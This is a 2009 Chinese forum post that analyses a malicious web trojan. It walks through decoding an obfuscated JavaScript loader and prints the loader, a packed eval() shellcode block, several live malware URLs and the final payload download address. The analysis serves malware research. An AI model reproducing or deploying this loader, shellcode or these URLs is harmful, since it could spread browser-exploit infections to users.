|
|
本帖最后由 幸福的猪猪 于 2009-12-27 12:42 编辑
本次恶意网马提供地址来自http://log.mtian.net/
hxxp://wokaaa.count.xj.cn/images/images/1.css 本次解析的恶意网址。
关于:hxxp://wokaaa.count.xj.cn/images/images/1.css解密的日志(全体输出 - 6):
Level 0>http://wokaaa.count.xj.cn/images/images/1.css
Level 1>http://jing.count.xj.cn/images/images/mepeg.htm
Level 1>http://chang.count.xj.cn/images/images/tj.htm
Level 1>http://henbu.count.xj.cn/images/images/ff.htm
Level 1>http://wen.count.xj.cn/images/images/of.htm
Level 1>http://ding.count.xj.cn/images/images/bf.htm
这个网马加密的方式跟我以前见到的网马加密的方式不一样。
以http://jing.count.xj.cn/images/images/mepeg.htm 这个网马的源代码为例:
<SCRIPT LANGUAGE="JavaScript">
<!--
function unencode(datastr, bassnum) {
var tempstr;
var tchar;
var newdata = "";
for (var i = 0; i < datastr.length; i=i+5)
{
tchar = 65535 + bassnum - datastr.substr(i,5);
tempstr = String.fromCharCode(tchar);
newdata = newdata+tempstr;
}
return newdata;
}
var webmm="6579965755657436575065751657976582765846658496579965761657486575965738657976582765827658466584965799657596575465741658276575465759657986582565791657546574165786657916582565797658276584665849657996574465760657456575465747657436582765744657456576065798658206575965753658136575365747657566582065797657996581265744657606574565754657476574365797658466584965799657446576065745657546574765743658276574465745657606579865820657596575365810658136575365747657566582065797657996581265744657606574565754657476574365797658466584965799658126576165748657596573865797658276584665849657996581265755657436575065751657976584665849";
document.write(unencode(webmm,324));
//-->
</SCRIPT>
用redoce 自动解密是解不出来的。(以前用redoce的自动解密功能,一般都能解析出网马的下载地址。不过,这次却解析不出来。)
在网上找了一些资料,最后发现有解析这种加密网页的方法。
就是把document.write替换成javascript:alert再用redoce的MINIHTML查看就可以得出以下代码:
---------------------------
Microsoft Internet Explorer
---------------------------
<html>
<body>
<div id="DivID">
<script src='dj.jpg'></script>
<script src='dj1.jpg'></script>
</body>
</html>
---------------------------
确定
---------------------------
把http://jing.count.xj.cn/images/images/mepeg.htm 里的mepeg.htm替换成dj.jpg 用redoce去解析得出以下代码:
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('35 1=173;35 2=1("%174%175%0%27%176%172%29%171%167%0%70%166%168%169%25%170%3%177");2+=1("%18%34%17%178%0%185%7%10%186%0%187%18%34%17%188%0%184%7%10");2+=1("%183%0%179%18%34%17%41%0%180%7%10%181%0%182%61%59%165%27%56");2+=1("%57%51%16%10%164%0%24%61%59%147%27%56%57%148%16%10%149%0%24");2+=1("%150%146%0%70%145%141%140%142%143%144%151%152%160%161%162%163%159%158%69");2+=1("%154%153%155%156%157%189%0%190%40%223%46%33%23%224%47%225");2+=1("%23%226%46%33%23%222%47%221%217%48%31%216%7%218%58%51%18");2+=1("%10%219%0%21%220%227%228%235%236%237%238%234%40%233%229%230%231");2+=1("%232%215%48%49%38%214%198%199%200%201%197%196%38%192%191%193%139");2+=1("%195%202%0%203%58%31%31%210%8%211%0%212%0%213%209%0%208");2+=1("%204%3%12%205%0%49%52%52%11%206%207%239%135%72%74%73%75");2+=1("%96%92%93%86%69%84%85%3%4%83%3%82%79%80%41%81%3");2+=1("%65%50%45%78%0%8%87%0%11%67%68%63%71%88%0%64%66");2+=1("%25%94%0%95%0%29%25%89%3%90%91%50%45%77%0%8%76");2+=1("%0%11%67%68%63%71%138%0%64%66%125%126%127%124%24%123%3");2+=1("%119%120%121%21%122%128%129%97%136%0%11%21%137%134%32%133%130");2+=1("%131%132%0%118%117%42%104%105%106%103%16%29%102%17%98%0%11");2+=1("%99%100%53%15%33%101%107%108%114%115%0%11%14%116%113%7%0");2+=1("%112%109%0%110%111%194%62%15%54%445%13%39%377%16%43%378%3");2+=1("%36%3%37%5%379%380%44%376%26%19%20%8%375%3%8%371%0");2+=1("%370%13%12%28%3%14%30%372%373%32%374%381%26%19%20%8%382");2+=1("%3%8%390%0%391%13%12%28%3%14%30%392%240%32%393%389%26");2+=1("%19%20%8%388%3%8%384%0%383%13%12%28%3%14%30%385%386");2+=1("%387%62%15%54%369%368%39%351%7%43%352%3%36%3%37%353%4");2+=1("%354%0%350%349%345%344%7%6%5%4%346%0%347%348%355%356%7");2+=1("%6%5%4%364%0%365%366%367%363%7%6%5%4%362%0%358%357");2+=1("%359%360%7%6%5%4%361%0%394%395%429%430%7%6%5%4%431");2+=1("%3%432%428%427%423%7%6%5%4%422%0%424%425%426%433%7%6");2+=1("%5%4%434%0%441%442%443%444%7%6%5%4%440%3%439%435%436");2+=1("%437%7%6%5%4%438%3%421%420%55%403%7%6%5%4%404%0");2+=1("%405%406%402%401%0%6%5%4%397%0%396%398%399%400%0%6%5");2+=1("%4%407%3%408%416%417%418%0%6%5%4%419%3%415%414%55%410%0");2+=1("%6%5%4%409%3%411%412%413%343%0%6%5%4%342%3%274%275");2+=1("%276%277%0%6%5%4%273%3%272%268%267%269%0%6%5%4%270");2+=1("%0%271%278%279%287%0%6%5%4%288%3%289%290%8%286%3%8");2+=1("%285%3%281%280%12%282%3%4%283%3%284%266%265%248%0%6%5");2+=1("%4%249%0%250%251%247%246%0%6%5%242%241%22%243%244%245%22");2+=1("%252%253%261%9%262%263%264%22%260%259%9%255%254%53%256%257%258");2+=1("%291%292%326%327%9%328%9%329%60%325%324%320%319%321%65%322%323");2+=1("%330%331%338%339%340%341%337%336%332%333%334%335%9%318%9%317%60");2+=1("%9%300%301%302%15%303%4%299%3");35 298=1("%294%293%295%296%297%304%44%305%313%314%315%316%312%311%307%306%308%42%309%310%0");',10,446,'u0000|fucky|s|uFFFF|uE8C3|u08C4|u8300|u0001|uE850|u8B3E|uE800|uD0FF|uE8FF|uFFFE|uC483|u2444|u0002|uE8F8|u0003|u448D|u0424|uFC8B|u408B|u42C7|uC358|uE8D0|u15EB|u0068|uFFE6|uFF00|uC308|u5050|u6800|u3E20|u8B00|var|uE6E8|u83FF|uCC8B|u50FF|uC73E|u000C|u6A2F|uE900|u746E|uE854|u646D|u2063|uC033|uDB33|u50C0|uC8E8|u5353|u8B36|u5004|u5002|u0010|u5700|u5053|u53DC|uDD03|u8B53|u8D15|u7700|uFF33|u33FF|uFF57|u8036|u243C|uFF05|uF88B|uE80A|u0F75|u9005|u7881|u4190|u0255|u001E|u0054|u0401|uC280|u04E8|u11B8|uFF11|uE8E0|uFF17|u408D|u028B|u0241|uFED1|u5753|u3356|u5506|uEC8B|u01FB|uFF68|u7490|uE814|u01CB|uF83B|u0874|u00FF|u8BD0|u24E8|u3E00|u74FF|u2024|uFF3E|u2474|u6E6F|u7568|u6C72|u68C3|uB85E|uE81C|u01EF|u5F10|u75A6|uF300|u56FF|u8357|u08EC|u086A|uF9E8|u02EB|u58D0|u5F5E|uC35B|u3E57|u77FF|u7246|uF48B|u08B9|u4549|u656D|uE838|u025D|u6168|u020B|u3EC0|uB0C0|u3349|uFCC3|uAEF2|u478D|uC933|u0453|u206A|uB0E8|u00E2|uE857|u5FFF|u5BC3|uACE9|uC3E0|u0004|u5B00|uEC81|u47C7|u3E66|uC63E|uB807|u893E|u015F|u00FA|u406A|u05EB|u0800|uF35E|uFFA4|uFFF6|uB9D0|u6A00|unescape|uE890|u034D|u0020|u54E8|u0038|uA0E8|u78E8|u001A|u58EB|u0030|u5BE8|u64E8|u0046|uF2E8|u0022|u0114|uD48B|uC383|uD98B|u3310|uEB6D|u43C7|uF2EB|u04C0|u7D54|u3E09|u1C89|u8308|u012C|u5100|u60A0|u0339|u3880|u74E9|u8D00|u04A1|u5750|u033B|u19E8|u6400|uF883|u54EC|u0468|u10C2|u5200|u0072|uC78B|u8322|u2F0C|u6302|u2F04|u3E22|u6308|uC083|u3E08|u3322|u3ED2|u5088|u8302|u2200|u66F6|u188A|uDB84|u0374|uEB40|u8005|u7776|u64C0|u33C3|u8530|u78C0|u3E10|u2AE8|u50EC|u3EE8|u000F|u8E68|u0E4E|u3E0C|u708B|u60C3|u3C40|u246C|u3624|u458B|u7CC0|u8334|uAD1C|u0840|uEBC3|u3E0B|u5005|u4FEF|u50B3|uC524|u86E8|u0057|u7268|u6868|uFE42|u9768|uE2C9|u50A3|u9AE8|uB3FE|u5016|uFFFC|uB5E9|uFFE8|uFDA9|u4F68|uFEAB|uFBE0|u72E8|uFE44|u13EB|u656A|u363C|u548B|u7074|u7468|u2F3A|u632F|u632E|u|uFB4F|u8B04|uC503|u8936|u611C|u756F|u782E|u6761|u6D69|u7365|u2E73|u736A|u2F73|u6567|u2E6A|u6E63|u692F|u616D|u1C5A|u4B0C|u038B|u348B|u33F5|uFCC0|u84AC|u3E49|u3BE3|u7828|uD503|u184A|u205A|u74C0|uC107|u3EDF|u5A8B|u0324|u66DD|u7528|u247C|u0DCF|uF803|uF4EB|u3B36|uFE56|uAEE8|uC6E8|u5079|u0197|uEC68|u0397|u46C6|u1B68|uAAE8|uFE40|u04C4|u01AB|u500C|uB2E8|uEF56|uED68|u5036|u8AE8|u015B|u016F|u9EE8|u0183|uAA68|u0DFC|u507C|uFFFD|u6BE8|uB9E9|u0223|u3368|u0032|u7375|uFDE4|u6C64|u4AE8|uFEE0|u6AC3|u686C|u7265|uFDBA|u65E9|u01CF|u7668|u7867|uEB00|uFD90|u6F64|u01F9|u8FE9|u6368|u6873|uF068|u048A|u9E68|u00CF|uBBF9|u5035|uEAE8|uFEE8|u5073|u12E8|u00E3|u7E68|uE2D8|uFE92|u5768|uFE6A|uC2E8|uE068|u305B|u5094|u1E7A|u1A68|uB5A0|u50BB|uD6E8|uFE7E|u8197|u5968|u0133|u62E8|uEF68|uE0CE|u5060|u501C|uDB68|u505F|u76E8|uFEF7|u7868|u4EE8|u011F|u9B5E|u501E|u26E8|uFEA7|uAB68|uFF36|uB068|u2D49|u50DB|u3AE8|u0BE8'.split('|'),0,{}))
接着用redoce的EVAL()解析得出的代码,用redoce的自动解密得出网马的最终下载地址:http://c.count.xj.cn/images/images/js.js
附上样本(把js后缀名改成rar,可以得出两个木马程序)就是样本的是08年10月份的。 |
评分
-
查看全部评分
|
发表于 2009-12-27 12:21:30
发表于 2009-12-28 02:20:39
